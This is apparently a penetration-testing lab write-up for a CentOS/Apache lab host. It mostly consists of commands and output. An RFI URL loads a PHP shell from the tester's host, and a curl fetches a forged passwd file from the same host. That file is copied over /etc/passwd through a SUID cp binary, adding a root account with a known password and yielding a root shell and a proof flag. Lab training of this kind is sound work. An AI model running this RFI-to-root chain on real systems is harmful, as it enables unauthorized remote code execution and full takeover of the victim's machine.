1011.1.35

RFI Page Parameter found by manual probing. OS Reverse shell and cp SUID privilege escalation.

PORT STATE SERVICE VERSION

22/tcp open ssh OpenSSH 7.4 (protocol 2.0)

80/tcp open http Apache httpd 2.4.6 ((CentOS) PHP/5.4.16)

PHP Really nice shell which could be used to spawn PHP based shell & os level shell

LogoRemote-File-Inclusion-Shell/knock.txt at master · namansahore/Remote-File-Inclusion-ShellGitHub
http://10.11.1.35/section.php?page=http://192.168.119.129:80/phpshell.php

```linpeas.sh shadow shell.elf rm shadow rm: cannot remove 'shadow': Operation not permitted

ls linpeas.sh shadow shell.elf

curl "http://192.168.119.129:80/passwd" -o passwd

% Total % Received % Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed 100 979 100 979 0 0 8770 0 --:--:-- --:--:-- --:--:-- 8819l s linpeas.sh passwd shadow shell.elf cp passwd /etc/passwd

tail /etc/passwd ftp14:50:FTP User:/var/ftp:/sbin/nologin nobody99:99:Nobody:/:/sbin/nologin systemd-network192:192:systemd Network Management:/:/sbin/nologin dbus81:81:System message bus:/:/sbin/nologin polkitd999:998:User for polkitd:/:/sbin/nologin sshd74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin postfix89:89::/var/spool/postfix:/sbin/nologin chrony998:996::/var/lib/chrony:/sbin/nologin apache48:48:Apache:/usr/share/httpd:/sbin/nologin chiya:$1$ignite$3eTbJm98O9Hz.k1NTdNxe1:0:0:root:/root:/bin/bash

su chiya Password: pass123 ls linpeas.sh passwd shadow shell.elf whoami root

cd /root ls anaconda-ks.cfg proof.txt cat proof.txt 99d8f4f10cf80eed5cb67e73e8b60a3d```

Helpful links

LogoHack The Box — Networked Writeup w/o MetasploitMedium
LogoComprehensive Guide on Remote File Inclusion (RFI) - Hacking ArticlesHacking Articles
LogoFrom Local File Inclusion to Remote Code Execution - Part 1 | Outpost 24 blog

Last updated